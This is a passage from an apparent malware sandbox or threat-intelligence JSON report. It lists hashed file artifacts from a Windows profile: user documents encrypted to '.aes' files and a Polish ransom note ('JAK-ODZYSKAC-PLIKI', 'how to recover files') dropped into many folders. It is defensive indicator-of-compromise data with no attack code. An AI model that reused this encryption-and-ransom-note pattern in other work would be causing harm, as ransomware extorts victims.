"hashes": [ { "md5_hash": "629c3efd21e819bf8403e7bac426ff43", "sha1_hash": "6ed8a239d5e5c66f7b902c5c150a485deca35888", "sha256_hash": "45b0b2e857db63bebfa3b32e019df246fce7be46831e8915db236db3f03ef7ab", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\eqov.odp.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\SzJbmK.odt.aes", "hashes": [ { "md5_hash": "7d6189a5e358a3db01df0b2bc9d0266a", "sha1_hash": "355c5027b132c1362a9e432006d1908838ac5ff4", "sha256_hash": "1e60d21becf6a5139ee2f4954254cf9628791fa1113fd2cf8fd4ca92aea49232", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\szjbmk.odt.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\TWIwOWOOuJkW1 zw.xlsx.aes", "hashes": [ { "md5_hash": "153ee5db297301ffd96983788dccea06", "sha1_hash": "af48185220f49d199f1cd2dd0e185700d2c05629", "sha256_hash": "32897f53047e553dc85126c580bbe2e66af2fc00e85086aa5328d2c997c85e0c", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\twiwowooujkw1 zw.xlsx.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\6_UYmFiKKpct\\x4gPVtjMaNPIjOUfG-lC.doc.aes", "hashes": [ { "md5_hash": "26f64e8f52b26de04290c2d83e4fb7c9", "sha1_hash": "affc2244157cb2ce3c91cf94b1b7386d44e08882", "sha256_hash": "23dddcc330308bdf3e54772f032afb7543cd69a2b44f12be89a8d9d8958ba1c6", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\x4gpvtjmanpijoufg-lc.doc.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\LQ5_4QuMSpXKagF3\\0kc5Nr5.rtf.aes", "hashes": [ { "md5_hash": "eb4ad3a71fef07c5a245e222165f1a97", "sha1_hash": "76b9971d5a40c71c7560e6cca39b44ad3ba52bc4", "sha256_hash": "2a458896b551c6fd2d2a581d5b99f1e2899ae369d27222d6161ec53ee6584f7c", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\0kc5nr5.rtf.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\LQ5_4QuMSpXKagF3\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "d28ffc0599c0bf506262aaa0165f04e8", "sha1_hash": "793b0f06ae3ae91e2e9e35304e3ea4915fa5e036", "sha256_hash": "0488eb29731384d0809a3b6ea398bf3696425c759803a0cf3cb07a750a8f1df9", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\LQ5_4QuMSpXKagF3\\9oIEfcy.csv.aes", "hashes": [ { "md5_hash": "d9f2d8ef5888f99a555ba812248ab13f", "sha1_hash": "c1b405cbf7a26852d3309ffcccdc9145cfe217ca", "sha256_hash": "49a36342151e20aefbf760e22585680bb975b7b79bfad8e1894d735a116e9c7f", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\9oiefcy.csv.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\LQ5_4QuMSpXKagF3\\A2yHS.rtf.aes", "hashes": [ { "md5_hash": "b2e7008bea1bf130a8fe4100c506c7cb", "sha1_hash": "5c6391712575d5591befc65932fe87ef58475a2f", "sha256_hash": "5fae1cfde692ab6411ac4548c2c1567b2717e5fe3498533751337d34861c4af4", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\a2yhs.rtf.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\LQ5_4QuMSpXKagF3\\JjJMV9taw3HHVo.ods.aes", "hashes": [ { "md5_hash": "add50a9d4fe1bbf810bc937bfdcbd5a2", "sha1_hash": "8e65889419c460fd1053a175bd6cb4ac2926d30c", "sha256_hash": "a0d78a02b9120cd272466d4abe2b6cf3eac07fce75124c69d44b767bf9b7889e", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\jjjmv9taw3hhvo.ods.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\LQ5_4QuMSpXKagF3\\Okb6cH9a4iQrI_jw.csv.aes", "hashes": [ { "md5_hash": "c32036dd886239d37943c07ba0162421", "sha1_hash": "e3762ea1a5d3175a86be28e4701178f14286815f", "sha256_hash": "12a6bfd65442d5a6dea0eb07df54c271530d9cacd50ca2c5d488f12bdc0b0137", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\okb6ch9a4iqri_jw.csv.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\LQ5_4QuMSpXKagF3\\PNXTgcQo4yh5r.odt.aes", "hashes": [ { "md5_hash": "6a14d50c775b23919f576eb8ccd008b5", "sha1_hash": "702ff432d5b62281f50f3b17cecd679caae3278f", "sha256_hash": "4786addec83d6e65d1d11d613d89e1d1f8a5c2bd394bcc3ad9283915bcab8059", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\pnxtgcqo4yh5r.odt.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\31C8Jf9y_xli.docx.aes", "hashes": [ { "md5_hash": "f4141b893956c5fcaa6b6f5657bdf728", "sha1_hash": "4deb4e031cbcffb0db883c470281ad096a2ef6b0", "sha256_hash": "701a94fdfff7ee232bec3f9fdf7082d9f9936f193abf9c67eb083c85db255abd", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\31c8jf9y_xli.docx.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "8c73ebb6192923bd0767d3e8e5eaa3ba", "sha1_hash": "0d71f61d9c8ccad698a30eb2908b921b1b14596f", "sha256_hash": "bb77c9af9c798eb1a2a18bd21b70ea100c20530f4de7ca2370e64bc0f4267e4f", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\4MQNX-qcbrpg7.docx.aes", "hashes": [ { "md5_hash": "68f7c6e9369b2fa7185fc46e6264cf62", "sha1_hash": "6d1dba81e71cb6803388eb92533786f337b63234", "sha256_hash": "3ecaf96c0f29ebb5688ce497f0d63ba88bcfcd8abfff76ddb2f2cf6d66c4c1d0", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\4mqnx-qcbrpg7.docx.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\aOniMexN t.xlsx.aes", "hashes": [ { "md5_hash": "6337e686c637acdb910f80da94d869b1", "sha1_hash": "b36bbde406ae72f2c78467800a609095dcc89e07", "sha256_hash": "6324ebb54dc1022d62d93931e6327dff103e4951f7a0f84a02d68b90f59c7850", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\aonimexn t.xlsx.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\BcAtcIc FCi96Kikr19.pptx.aes", "hashes": [ { "md5_hash": "aeeee30c5b77d154e1423af81dca3076", "sha1_hash": "afb08ed85991523a3f618133db01c401f6dba5f6", "sha256_hash": "b636ce4e26604c5c79691ea2168de1c7c95b39f613feadedf5d39f1e74871c36", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\bcatcic fci96kikr19.pptx.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\bdVwr.doc.aes", "hashes": [ { "md5_hash": "1f9c6027cd30ae2e2cafc82f218b8ed0", "sha1_hash": "7214cb54b3648d66efd5e1a2a0af95975182d7b7", "sha256_hash": "87d16ba0e6edc1bb891c79ac7d9a3e65cd1bdd4d09a6061be3282aa532a6f5c3", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\bdvwr.doc.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\D-4thVUMdh.csv.aes", "hashes": [ { "md5_hash": "6e238555ba20055a197fc06cae44d052", "sha1_hash": "a2708ecf3b0dad7eb50900a8ef632c3b2c19bbeb", "sha256_hash": "832a5693695b7fc95556d4a45f1cb062a1369ce5addaee64920e10b4aed4e465", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\d-4thvumdh.csv.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\Ev0YlMk5921.pptx.aes", "hashes": [ { "md5_hash": "7e8911b50f352ff4575046afe9dfe30f", "sha1_hash": "4bae349c4c78751a39726411c591af439dc9ce6f", "sha256_hash": "4051677f29f7ec50a8f34a4c6c25132f2d53fed58c0dd7b0a7b483d0af0cf49b", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\ev0ylmk5921.pptx.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\FbmlDMOUw-TzOy_UnN7.xlsx.aes", "hashes": [ { "md5_hash": "39cd60a5cccc800a9a3ca9aee965d469", "sha1_hash": "60a5945c047bacc4bc53eb314f296828e37d05c9", "sha256_hash": "3112ec6461a1bfbeb9c7d294be6e83bd11627f7933d8b059a0e594d3363261a3", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\fbmldmouw-tzoy_unn7.xlsx.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\gXfWKSuNYtgFj.pptx.aes", "hashes": [ { "md5_hash": "043ba7ac688249dd26003e85ccdc0b84", "sha1_hash": "b7b5bb27edb9a11bcb7b53bef291a0eb442102d9", "sha256_hash": "864d89e06f543e6e0eb75c454d825bbfb2bab8c80aa506275f388c2e973e3d6a", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\gxfwksunytgfj.pptx.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\HHx-9RKiMuPSNON0eJb.pptx.aes", "hashes": [ { "md5_hash": "f84fe8b88700cafc4ff65e6298d5a1ef", "sha1_hash": "cda97cd47f344c4ce39926392f9c548b957e2b82", "sha256_hash": "aa41569f77a436824375431b555c936e3db6dbbe649c8ec12d2935a1d3519a4d", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\hhx-9rkimupsnon0ejb.pptx.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\lcPTyHQE.xlsx.aes", "hashes": [ { "md5_hash": "ad2026da18a6b90512a138ba1eb63480", "sha1_hash": "381041bc4e94295c38ca1357fc6e205acab7192b", "sha256_hash": "0d70b1d2ef594a2b81fafcdc134f86efee925230d0d36d0a0d2f2a02d5368e59", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\lcptyhqe.xlsx.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\u5X9.ppt.aes", "hashes": [ { "md5_hash": "cd6547e82546369d205f3c01ea5abbc0", "sha1_hash": "4130f2ee7457f5be0424affcc2b3708d256fdb00", "sha256_hash": "1cf5460dba6cfe5cba25fcb560b705964b94cb3a6c2b198d7a6ece21be011e5e", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\u5x9.ppt.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\WffPHgzW1qt5nuBKPq.docx.aes", "hashes": [ { "md5_hash": "1adb40e44060aba93c76a3109e110d1c", "sha1_hash": "db5ddc160bf842f336f418e21371346a3f09fc3b", "sha256_hash": "70f279cda13e70219f3d73933b90f5c8961db23b00fd003a7bf7f38cad1b1a39", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\wffphgzw1qt5nubkpq.docx.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\Zb6u3g7h.xlsx.aes", "hashes": [ { "md5_hash": "42d603d0f87c590def22ae3f8564d81f", "sha1_hash": "26771d40be67fcd75deb178cb9ded7eb83ec7fc7", "sha256_hash": "49e717e750ac3e95199a8a887f47feaf0dbd8aec66f394e9105fde8b40f2e658", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\zb6u3g7h.xlsx.aes", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\hGZFj\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "69acb08ae8248c29e285c9963fb7079f", "sha1_hash": "9e8b264a6cd08d7e34dba0ee314ba034fbe0583b", "sha256_hash": "4bc51d5c37619b6e1008b39ca72b5dccb28b952de60feedf9f504a979d87fcbe", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\hgzfj\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\TmdCgSua1hPeIxp_g-_\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "69acb08ae8248c29e285c9963fb7079f", "sha1_hash": "9e8b264a6cd08d7e34dba0ee314ba034fbe0583b", "sha256_hash": "4bc51d5c37619b6e1008b39ca72b5dccb28b952de60feedf9f504a979d87fcbe", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\tmdcgsua1hpeixp_g-_\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "a62a3583cdce1e80ddf7213b9f0cf77e", "sha1_hash": "4fdc86cd4eaea06740c79d019791429deefebb68", "sha256_hash": "35f91180f40bf66f2d652a57b0e47939e2bcdd5bbf6303cd36f04b5014c5a9c0", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\k-E 1jpgXeyuKG\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "8320e6f45dadffeec167aeee53609ddd", "sha1_hash": "198068b05a66d806fd08af8eb9488821c360b93c", "sha256_hash": "c9038eb0fa2705d6c7c6500f9514f8905b0f787dcb549b0810e45c993f2bab6c", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\vuewIfEOk\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "74c1a1938a4d9ab8d168acc8a181d601", "sha1_hash": "6cbc228c55739bf871256f3a4223ee060f8ddf80", "sha256_hash": "1213dc777fe40c479bd05d88224cff59e4be0682fe19512d1198f3bc71f3459a", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\vuewifeok\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\w26w\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "568ee3a769c9fea2d890bb6bc23c43fd", "sha1_hash": "24ee2b9ae39e68a8db7d433d2b28dae8e8bf7ef8", "sha256_hash": "823d99ece7193051415cd84e5417f72858a43a0499f061ebd366ecf3eec37758", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\w26w\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "e17f25a09167186cbeb09ae377389eb2", "sha1_hash": "b9f29decd8fdbe5aeb45da2133995c8ddf018b6e", "sha256_hash": "1095d4cd7fcbb4607ec5a463c37231865f1881e0bf043ad77cff54784f8bec9c", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "e17f25a09167186cbeb09ae377389eb2", "sha1_hash": "b9f29decd8fdbe5aeb45da2133995c8ddf018b6e", "sha256_hash": "1095d4cd7fcbb4607ec5a463c37231865f1881e0bf043ad77cff54784f8bec9c", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "61702ec4ed58e11e5017a00eb72c6b2f", "sha1_hash": "7309d13f144e5ff6eb79a0149b8cc52249328d5a", "sha256_hash": "1f7d1c2f78b2fe7142a835ccfbd7cdb33658c40c3ef00d7aa149a6d2d3b6687d", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\oGal6NmV2cY0e3 6\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "f78df3ccf69363318da2b79f73275f6e", "sha1_hash": "41c9649c71bb5259f57663a682dfd41ab8c8819d", "sha256_hash": "0ac260de49443f32b63b2baca13f5cf18f879883dbbd93ebed6d03dbf1bff09b", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\ogal6nmv2cy0e3 6\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\clNOjUrNMvl\\D XgP5yxO\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "386d8d06597b757afa311c47c3aa4b82", "sha1_hash": "0b3b2414c455dc89776cca1b7fe73556ccb55c3f", "sha256_hash": "3e29286595c06b7005455a5741d77438965a41b89a2907a268d0e006c9293839", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\clnojurnmvl\\d xgp5yxo\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\clNOjUrNMvl\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "386d8d06597b757afa311c47c3aa4b82", "sha1_hash": "0b3b2414c455dc89776cca1b7fe73556ccb55c3f", "sha256_hash": "3e29286595c06b7005455a5741d77438965a41b89a2907a268d0e006c9293839", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\clnojurnmvl\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "7f3ac020ebd789a44fe7f9054a8d2c78", "sha1_hash": "61416220fae7e3b98897ca7d9c31a7bdba43ced9", "sha256_hash": "e8381bb080537827cda3fa5f564bed2f476ddc429c71dc851328a680e30d10b1", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "7f3ac020ebd789a44fe7f9054a8d2c78", "sha1_hash": "61416220fae7e3b98897ca7d9c31a7bdba43ced9", "sha256_hash": "e8381bb080537827cda3fa5f564bed2f476ddc429c71dc851328a680e30d10b1", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "7f292a9240dcc5e82bac4a9d88b3b5a6", "sha1_hash": "fc0bf85fcfd24410fbfbfb350a6764c1cdac295c", "sha256_hash": "d6e461b51bde144081fcebe373e689b337a4584ac37630e1b77a3d3d3782c4fb", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\Eyqf5KSeCaMN6njljm\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "7f292a9240dcc5e82bac4a9d88b3b5a6", "sha1_hash": "fc0bf85fcfd24410fbfbfb350a6764c1cdac295c", "sha256_hash": "d6e461b51bde144081fcebe373e689b337a4584ac37630e1b77a3d3d3782c4fb", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\eyqf5ksecamn6njljm\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\LNVGgurmVCVr5ekCq-4\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "7f292a9240dcc5e82bac4a9d88b3b5a6", "sha1_hash": "fc0bf85fcfd24410fbfbfb350a6764c1cdac295c", "sha256_hash": "d6e461b51bde144081fcebe373e689b337a4584ac37630e1b77a3d3d3782c4fb", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\lnvggurmvcvr5ekcq-4\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\WQHnOCgB21aCcC\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "053b945285739893c800d9aec5eb49ad", "sha1_hash": "bb3da34a9fefe9a57e5c1fb1abf2529df3dce0f7", "sha256_hash": "d23ca24ff3256b4352ef6445afe23a22476ce2c17388680f6e8c7341591e440b", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\wqhnocgb21accc\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "053b945285739893c800d9aec5eb49ad", "sha1_hash": "bb3da34a9fefe9a57e5c1fb1abf2529df3dce0f7", "sha256_hash": "d23ca24ff3256b4352ef6445afe23a22476ce2c17388680f6e8c7341591e440b", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\IjyI ku9gKWYYPFGATz\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "dcdeefee3471d9f83de438345adaf690", "sha1_hash": "50100ca304709d1100f77e998c26dabdb60d21d2", "sha256_hash": "f2152c6eae06767063cfe7d5d8d30e3ebfefef59b4d4c29a2d1a749f01f38d54", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\ijyi ku9gkwyypfgatz\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\r-_fU8vdku2TwrL\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "6f071e286fb00941bb763dcf065a2b03", "sha1_hash": "e39ec167a2ae272277bd74eee84e3908c3cc60b3", "sha256_hash": "c06dea51ced62ad71648fb18782665920e285472ca578256236d31eed785795e", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\r-_fu8vdku2twrl\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "e0eccdf604f1efd4682a51b796e9ef62", "sha1_hash": "4d09e0dd3bf3a06f104be9dc5b55b3751498c2a3", "sha256_hash": "a05219897c20d9b0e5c51af362fbbbcd8b1673aa6db26b735a1eee193327a99d", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "b78f205248971f2d1ff730768e63e5e2", "sha1_hash": "35269e157a6cc2e2bb959f2b4d3521f56ebd4798", "sha256_hash": "b2a65cde28ae1242f90263631daa065c89889d5563c5e40f0b45eabd001d7edb", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\videos\\#$# jak-odzyskac-pliki.txt", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Desktop\\1ZxEG6XM\\cNh\\#$# JAK-ODZYSKAC-PLIKI.txt", "hashes": [ { "md5_hash": "b78f205248971f2d1ff730768e63e5e2", "sha1_hash": "35269e157a6cc2e2bb959f2b4d3521f56ebd4798", "sha256_hash": "b2a65cde28ae1242f90263631daa065c89889d5563c5e40f0b45eabd001d7edb", "type": "file_hash", "version": 1 } ], "norm_filename": 